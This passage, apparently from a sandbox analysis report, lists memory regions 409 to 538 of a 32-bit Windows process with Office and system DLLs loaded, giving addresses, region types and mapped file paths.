entry_point = 0x0 region_type = private name = "private_0x000000000f620000" filename = "" Region: id = 409 start_va = 0xfa30000 end_va = 0xfe38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa30000" filename = "" Region: id = 410 start_va = 0xfe40000 end_va = 0x1024efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe40000" filename = "" Region: id = 411 start_va = 0x10250000 end_va = 0x10250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010250000" filename = "" Region: id = 412 start_va = 0x10260000 end_va = 0x10260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010260000" filename = "" Region: id = 413 start_va = 0x10270000 end_va = 0x102affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010270000" filename = "" Region: id = 414 start_va = 0x102b0000 end_va = 0x103affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102b0000" filename = "" Region: id = 415 start_va = 0x103b0000 end_va = 0x1042ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103b0000" filename = "" Region: id = 416 start_va = 0x10430000 end_va = 0x10440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 417 start_va = 0x10450000 end_va = 0x1148ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 418 start_va = 0x11490000 end_va = 0x11498fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011490000" filename = "" Region: id = 419 start_va = 0x114a0000 end_va = 0x114a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114a0000" filename = "" Region: id = 420 start_va = 0x114b0000 end_va = 0x114b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114b0000" filename = "" Region: id = 421 start_va = 0x114c0000 end_va = 0x114fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114c0000" filename = "" Region: id = 422 start_va = 0x11500000 end_va = 0x11cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011500000" filename = "" Region: id = 423 start_va = 0x11d00000 end_va = 0x121bcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011d00000" filename = "" Region: id = 424 start_va = 0x121c0000 end_va = 0x1267cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000121c0000" filename = "" Region: id = 425 start_va = 0x12680000 end_va = 0x12a7afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012680000" filename = "" Region: id = 426 start_va = 0x12a80000 end_va = 0x12b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a80000" filename = "" Region: id = 427 start_va = 0x12b80000 end_va = 0x12c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012b80000" filename = "" Region: id = 428 start_va = 0x12c80000 end_va = 0x12c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c80000" filename = "" Region: id = 429 start_va = 0x12c90000 end_va = 0x12c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c90000" filename = "" Region: id = 430 start_va = 0x12ca0000 end_va = 0x12ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ca0000" filename = "" Region: id = 431 start_va = 0x12cb0000 end_va = 0x12cb1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 432 start_va = 0x12cc0000 end_va = 0x12cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012cc0000" filename = "" Region: id = 433 start_va = 0x12d00000 end_va = 0x12dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012d00000" filename = "" Region: id = 434 start_va = 0x12e00000 end_va = 0x12e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012e00000" filename = "" Region: id = 435 start_va = 0x12e40000 end_va = 0x12f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012e40000" filename = "" Region: id = 436 start_va = 0x12f40000 end_va = 0x12f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f40000" filename = "" Region: id = 437 start_va = 0x12f80000 end_va = 0x1307ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f80000" filename = "" Region: id = 438 start_va = 0x13080000 end_va = 0x1317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013080000" filename = "" Region: id = 439 start_va = 0x13180000 end_va = 0x13181fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013180000" filename = "" Region: id = 440 start_va = 0x13190000 end_va = 0x13190fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 441 start_va = 0x131a0000 end_va = 0x131a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131a0000" filename = "" Region: id = 442 start_va = 0x131b0000 end_va = 0x131b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000131b0000" filename = "" Region: id = 443 start_va = 0x131c0000 end_va = 0x131fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131c0000" filename = "" Region: id = 444 start_va = 0x13200000 end_va = 0x132fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013200000" filename = "" Region: id = 445 start_va = 0x13300000 end_va = 0x13335fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013300000" filename = "" Region: id = 446 start_va = 0x13340000 end_va = 0x13375fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013340000" filename = "" Region: id = 447 start_va = 0x13380000 end_va = 0x13391fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013380000" filename = "" Region: id = 448 start_va = 0x133a0000 end_va = 0x133a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133a0000" filename = "" Region: id = 449 start_va = 0x133b0000 end_va = 0x133b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133b0000" filename = "" Region: id = 450 start_va = 0x133c0000 end_va = 0x133c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133c0000" filename = "" Region: id = 451 start_va = 0x133d0000 end_va = 0x1340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000133d0000" filename = "" Region: id = 452 start_va = 0x13410000 end_va = 0x1341ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013410000" filename = "" Region: id = 453 start_va = 0x13440000 end_va = 0x1347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013440000" filename = "" Region: id = 454 start_va = 0x13480000 end_va = 0x1357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013480000" filename = "" Region: id = 455 start_va = 0x13580000 end_va = 0x1367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013580000" filename = "" Region: id = 456 start_va = 0x136b0000 end_va = 0x136bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000136b0000" filename = "" Region: id = 457 start_va = 0x136c0000 end_va = 0x137bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000136c0000" filename = "" Region: id = 458 start_va = 0x13800000 end_va = 0x1383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013800000" filename = "" Region: id = 459 start_va = 0x13840000 end_va = 0x1393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013840000" filename = "" Region: id = 460 start_va = 0x13940000 end_va = 0x13987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013940000" filename = "" Region: id = 461 start_va = 0x13990000 end_va = 0x13b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013990000" filename = "" Region: id = 462 start_va = 0x13b90000 end_va = 0x1406dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013b90000" filename = "" Region: id = 463 start_va = 0x14070000 end_va = 0x143f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014070000" filename = "" Region: id = 464 start_va = 0x14400000 end_va = 0x14786fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014400000" filename = "" Region: id = 465 start_va = 0x14790000 end_va = 0x1486ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 466 start_va = 0x14870000 end_va = 0x1496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014870000" filename = "" Region: id = 467 start_va = 0x14970000 end_va = 0x1497ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014970000" filename = "" Region: id = 468 start_va = 0x14980000 end_va = 0x1594ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014980000" filename = "" Region: id = 469 start_va = 0x36330000 end_va = 0x3633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000036330000" filename = "" Region: id = 470 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 471 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 472 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 473 start_va = 0x667a0000 end_va = 0x66a32fff monitored = 0 entry_point = 0x66887e80 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\SysWOW64\\msftedit.dll" (normalized: "c:\\windows\\syswow64\\msftedit.dll") Region: id = 474 start_va = 0x66a40000 end_va = 0x66abafff monitored = 0 entry_point = 0x66a64d80 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 475 start_va = 0x66ac0000 end_va = 0x66c26fff monitored = 0 entry_point = 0x66b3b9d0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 476 start_va = 0x66c30000 end_va = 0x67069fff monitored = 0 entry_point = 0x66cdf860 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 477 start_va = 0x67070000 end_va = 0x670d4fff monitored = 0 entry_point = 0x670a6fb0 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\SysWOW64\\msvcp110_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp110_win.dll") Region: id = 478 start_va = 0x670e0000 end_va = 0x67129fff monitored = 0 entry_point = 0x670ea100 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\SysWOW64\\policymanager.dll" (normalized: "c:\\windows\\syswow64\\policymanager.dll") Region: id = 479 start_va = 0x67130000 end_va = 0x67178fff monitored = 0 entry_point = 0x67136450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 480 start_va = 0x67180000 end_va = 0x671fcfff monitored = 0 entry_point = 0x671a3ef0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 481 start_va = 0x67200000 end_va = 0x6720afff monitored = 0 entry_point = 0x67202150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 482 start_va = 0x67210000 end_va = 0x67438fff monitored = 0 entry_point = 0x67249bb4 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\wxpnse.dll") Region: id = 483 start_va = 0x67440000 end_va = 0x674d1fff monitored = 0 entry_point = 0x6744dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 484 start_va = 0x674e0000 end_va = 0x674f9fff monitored = 0 entry_point = 0x674e3270 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 485 start_va = 0x68020000 end_va = 0x680c1fff monitored = 0 entry_point = 0x6805e8b0 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\SysWOW64\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.search.dll") Region: id = 486 start_va = 0x680d0000 end_va = 0x680dcfff monitored = 0 entry_point = 0x680d7d80 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\SysWOW64\\atlthunk.dll" (normalized: "c:\\windows\\syswow64\\atlthunk.dll") Region: id = 487 start_va = 0x680e0000 end_va = 0x68161fff monitored = 0 entry_point = 0x6811c7c0 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\SysWOW64\\StructuredQuery.dll" (normalized: "c:\\windows\\syswow64\\structuredquery.dll") Region: id = 488 start_va = 0x68170000 end_va = 0x681adfff monitored = 0 entry_point = 0x6818ab30 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 489 start_va = 0x681b0000 end_va = 0x681d2fff monitored = 0 entry_point = 0x681c69b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 490 start_va = 0x681e0000 end_va = 0x681f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 491 start_va = 0x68200000 end_va = 0x68372fff monitored = 0 entry_point = 0x682ad220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 492 start_va = 0x68380000 end_va = 0x683e6fff monitored = 0 entry_point = 0x68395a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 493 start_va = 0x683f0000 end_va = 0x68410fff monitored = 0 entry_point = 0x683fbdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 494 start_va = 0x68420000 end_va = 0x68428fff monitored = 0 entry_point = 0x68423830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 495 start_va = 0x68430000 end_va = 0x68c24fff monitored = 0 entry_point = 0x68495279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 496 start_va = 0x68c30000 end_va = 0x68cc2fff monitored = 0 entry_point = 0x68c50ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 497 start_va = 0x68cd0000 end_va = 0x68d03fff monitored = 0 entry_point = 0x68ce8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 498 start_va = 0x68d10000 end_va = 0x68eb1fff monitored = 0 entry_point = 0x68d11000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 499 start_va = 0x68ec0000 end_va = 0x68ec7fff monitored = 0 entry_point = 0x68ec17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 500 start_va = 0x68ed0000 end_va = 0x68f28fff monitored = 1 entry_point = 0x68ee0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 501 start_va = 0x68f30000 end_va = 0x692b8fff monitored = 0 entry_point = 0x68fccc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 502 start_va = 0x692c0000 end_va = 0x6a071fff monitored = 0 entry_point = 0x692c1000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 503 start_va = 0x6a080000 end_va = 0x6a617fff monitored = 0 entry_point = 0x6a081000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 504 start_va = 0x6a620000 end_va = 0x6ad34fff monitored = 0 entry_point = 0x6a621000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 505 start_va = 0x6ad40000 end_va = 0x6b041fff monitored = 0 entry_point = 0x6ad41000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 506 start_va = 0x6b050000 end_va = 0x6b224fff monitored = 0 entry_point = 0x6b051000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 507 start_va = 0x6b230000 end_va = 0x6b2fafff monitored = 0 entry_point = 0x6b246a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 508 start_va = 0x6b300000 end_va = 0x6b46afff monitored = 0 entry_point = 0x6b36e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 509 start_va = 0x6b470000 end_va = 0x6b4d4fff monitored = 0 entry_point = 0x6b48fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 510 start_va = 0x6b4e0000 end_va = 0x6c0d1fff monitored = 0 entry_point = 0x6b4e1000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: id = 511 start_va = 0x6c0e0000 end_va = 0x6c1c0fff monitored = 0 entry_point = 0x6c10e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 512 start_va = 0x6c1d0000 end_va = 0x6c23cfff monitored = 0 entry_point = 0x6c20ab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 513 start_va = 0x6c240000 end_va = 0x6c3f4fff monitored = 0 entry_point = 0x6c333d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 514 start_va = 0x6c400000 end_va = 0x6c478fff monitored = 1 entry_point = 0x6c40f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 515 start_va = 0x6c480000 end_va = 0x6c4dbfff monitored = 0 entry_point = 0x6c488880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 516 start_va = 0x6c4e0000 end_va = 0x6c50bfff monitored = 0 entry_point = 0x6c5024b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 517 start_va = 0x6c510000 end_va = 0x6c553fff monitored = 0 entry_point = 0x6c52aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 518 start_va = 0x6c560000 end_va = 0x6c56efff monitored = 0 entry_point = 0x6c562a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 519 start_va = 0x6c570000 end_va = 0x6c58cfff monitored = 0 entry_point = 0x6c577240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 520 start_va = 0x6c590000 end_va = 0x6c5affff monitored = 0 entry_point = 0x6c5a2810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 521 start_va = 0x6c5b0000 end_va = 0x6c5b5fff monitored = 0 entry_point = 0x6c5b1490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 522 start_va = 0x6c5c0000 end_va = 0x6c5d4fff monitored = 0 entry_point = 0x6c5cb1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 523 start_va = 0x6c5e0000 end_va = 0x6c60cfff monitored = 0 entry_point = 0x6c5f2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 524 start_va = 0x6c650000 end_va = 0x6c659fff monitored = 0 entry_point = 0x6c653200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 525 start_va = 0x6c6a0000 end_va = 0x6c8b7fff monitored = 0 entry_point = 0x6c7497b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 526 start_va = 0x6c8c0000 end_va = 0x6c92ffff monitored = 0 entry_point = 0x6c8f9e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 527 start_va = 0x6cdc0000 end_va = 0x6ce66fff monitored = 0 entry_point = 0x6cdf6240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 528 start_va = 0x6ce70000 end_va = 0x6ceb0fff monitored = 0 entry_point = 0x6ce77fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 529 start_va = 0x6cec0000 end_va = 0x6d0b0fff monitored = 0 entry_point = 0x6cfa3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 530 start_va = 0x6d0c0000 end_va = 0x6d54dfff monitored = 0 entry_point = 0x6d44a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 531 start_va = 0x6ea60000 end_va = 0x6ea6afff monitored = 0 entry_point = 0x6ea61d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 532 start_va = 0x6ead0000 end_va = 0x6ecdefff monitored = 0 entry_point = 0x6eb7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 533 start_va = 0x6f880000 end_va = 0x6f89cfff monitored = 0 entry_point = 0x6f883b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 534 start_va = 0x6fe10000 end_va = 0x6fe3efff monitored = 0 entry_point = 0x6fe295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 535 start_va = 0x6fe40000 end_va = 0x6fe52fff monitored = 0 entry_point = 0x6fe49950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 536 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 537 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 538 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = 